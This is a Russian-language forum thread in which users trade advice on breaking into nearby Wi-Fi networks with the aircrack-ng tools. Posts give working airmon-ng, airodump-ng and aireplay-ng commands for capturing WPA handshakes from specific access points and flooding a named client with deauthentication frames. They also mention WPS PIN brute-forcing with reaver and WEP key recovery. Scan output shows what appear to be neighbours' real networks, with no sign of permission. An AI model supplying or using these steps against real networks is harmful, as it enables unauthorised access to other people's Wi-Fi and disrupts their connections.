быстрее всего твоя проблемма в мощьности сигнал, смотри чтобы сигнал точки был не выше -65 дб - это раз второе, я там видел на одном окне у тебя надпись fixed channel -1, э использует "свою" уязивимость ВПС третье, ривер это ревир а все остальное это отдельно, ривер работает с конкретной уязивимостью ВПС и может перебором ламать пин роутера если этот конкретный роутер имеет эту уязвимость и не лимитирует попытки подключений что уже редкость четвертое, ты не видиш мак адреса бссид но зато видиш клиетов, а также видиш ш ессид (тоисть имя) базовой станции, вобше бывает на оборот, видно базу а не видно клиента и непонятно что подать аиреплаю на отправку чтоб разорвать соединение и запросить его повторнно с высылкой хендшейко который и нужно пофмать пятое, крякать нужно уже пойманый хеншейк который записался в кап файл. если не поможет напишу статью с подробным разяснением )
Мля , чувак . Ты не указываешь на конкретную тд. Синтаксис для перехвата хендшейка прост , но важно чтобы кто-то из пользователей был подключен , иначе чей хэндшейк перехватывать ? Итак синтаксис airmon-ng wlan0 - переводит ваш адаптер в режим мониторинга. airodump-ng mon0 - сканируете в надежде найти тд. airodump-ng -w(имя файла хэндш.) --bssid(мак тд) - c(канал тд) mon0 - конкретизируем точку доступа и начинаем собирать пакеты!!! П.С . а вообще , учите английский и учитесь пользоваться гуглом и яндексом , там этого добра навалом . На первых ссылках наипонятнейшим языком все разъясняют.(тд - точка доступа)
С помощью airodump-ng отловил сетку с WEP , но к сожалению название скрыто, кто-то может посоветовать, как можно "поработать" с этой сетью? Сейчас сижу на мобильном интернете, а здесь это капец как не дёшево. Заранее спасибо за советы! P.S. И подскажите, почему у неё PWR стоит в -1 ? BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID A0:21:B73E9 -1 0 0 0 -1 -1 <length: 0> 00:8E:F2:AB:EF:0C -1 0 55 0 10 -1 WPA <length: 0> 58:23:8C:03:88:4C -39 712 0 0 1 54e WPA2 CCMP PSK THOM_ONO4321 DC:53:7C:30:3B1 -42 1310 0 0 6 54e WPA2 CCMP PSK ONO8DED 90:67:1C:19:30:3C -49 967 63 0 4 54e WPA2 CCMP PSK vodafone3034 E0:41:36:BD:C2:8A -52 1176 275 0 10 54e WPA2 CCMP PSK MOVISTAR_C289 10:620:19:6C:EB -57 1235 19 0 11 54e WPA2 CCMP PSK Lowi6CE6 D8:FB:5E:9D:86:27 -62 879 7 0 1 54e WPA2 CCMP PSK MOVISTAR_8626 D8:B6:B7:2E:85:2E -61 1108 0 0 11 54e WPA2 CCMP PSK JAZZTEL_852E 80:29:94:B1C:92 -53 1156 170 0 11 54e WPA2 CCMP PSK ONO6461 90:67:1C:19:7F:F4 -84 71 7 0 1 54e WPA2 CCMP PSK vodafone7FEE 00:26:4D:49:68:6C -1 0 1 0 2 -1 WEP WEP <length: 0> 70:5A:9E:27:5C:BD -85 26 0 0 1 54e WPA2 CCMP PSK vodafone5CB8 3A:F7:3D:08:68:6E -90 49 0 0 1 54e WPA2 CCMP PSK <length: 21>
Когда я спрашивал, можно ли ,как-то поработать с сеткой WEP, я имел ввиду,можно ли при таком уровне мощности, как -85 пытаться деаутентифицировать точку или это дохлый номер? Клиентов у неё я в явном виде не наблюдаю, поэтому и спрашиваю, можно ли как-то "ломануть" эту ТД? P.S. AWUS036AC 90:67:1C:19:7F:F4 -84 71 7 0 1 54e WPA2 CCMP PSK vodafone7FEE 00:26:4D:49:68:6C -1 0 1 0 2 -1 WEP WEP <length: 0> 70:5A:9E:27:5C:BD -85 26 0 0 1 54e WPA2 CCMP PSK vodafone5CB8
PWR -1 Это мёртвый сигнал.Настолько мёртвый,что даже beacon пакеты не долетают до антенны. Чаще всего,именно поэтому точка "скрыта".
При атаке на точку с WEP, деаутентификация не требуется.Там принцип атаки другой.Основная задача,заключается в сборе необходимого объёма данных (пакетов), и расшифровки ключа. С таким сигналом,вряд ли получится.А если и получится,юзать точно не выйдет. Считается,что клиент не нужен.Но в моих случаях,именно наличие клиента,позволяло получить ключ.Причём для более быстрого сбора данных,нужен активный траффик между точкой и клиентом. Есть команда,которая должна заставлять точку,активно генерировать пакеты.Вот этот трюк и не работал.
Вот ещё взял только что,вроде всё делал правильно,гляньте валидно ли содержимое Заранее всем грасиас!
Спасибо и если не трудно, могли бы Вы пояснить, как дальше действовать, там что то чистить или конвертить? К сожалению плаваю пока в этой теме.
Вродебы привёл в порядок, взгляните пожалуйста на скрин,или годный сар-файл для дальнейшей работы с ним?
fixed chanel wlan1: -1 , иногда в окне терминала выскакивает это оповещение, не смотря на то что ты задал совсем иной канал? Помогает только перезагрузка. Что это за фокус? команда была следующая: airodump-ng wlan1 --bssid E0:41:36:BD:C2:8A --channel 10 --write handshake
Кто с таким сталкивался в своей практике,поделитесь инфой: Всё делаю,как обычно,убиваю всё лишнее,перевожу железку в режим монитора,нахожу искомую ТД,далее: airodump-ng wlan1 --bssid 8C:04:FF:BE:02:AE --channel 1 --write handshake --wps --ignore-negative-one, затем направленное deauth сообщение: sudo aireplay-ng --deauth 13 -a 8C:04:FF:BE:02:AE -c BC:03:08:AF:51:2A wlan1 --ignore-negative-one, клиент отваливается,подключается,нет рукопожатия. Пробуем Отправить широковещательное deauth сообщение: sudo aireplay-ng wlan1 --deauth 13 -a 8C:04:FF:BE:02:AE --ignore-negative-one, мощность на ТД падает до нуля,нет рукопожатия,ок. Заё-ем клиента до нервного срыва: sudo aireplay-ng --deauth 100 -a 8C:04:FF:BE:02:AE -c BC:03:08:AF:51:2A wlan1 --ignore-negative-one, клиент пропадает из мониторинга (перегружает телефон),и так было дважды. Вобщем довели друг друга до нервного срыва,а результат тотже,нет рукопожатия. Как так может быть?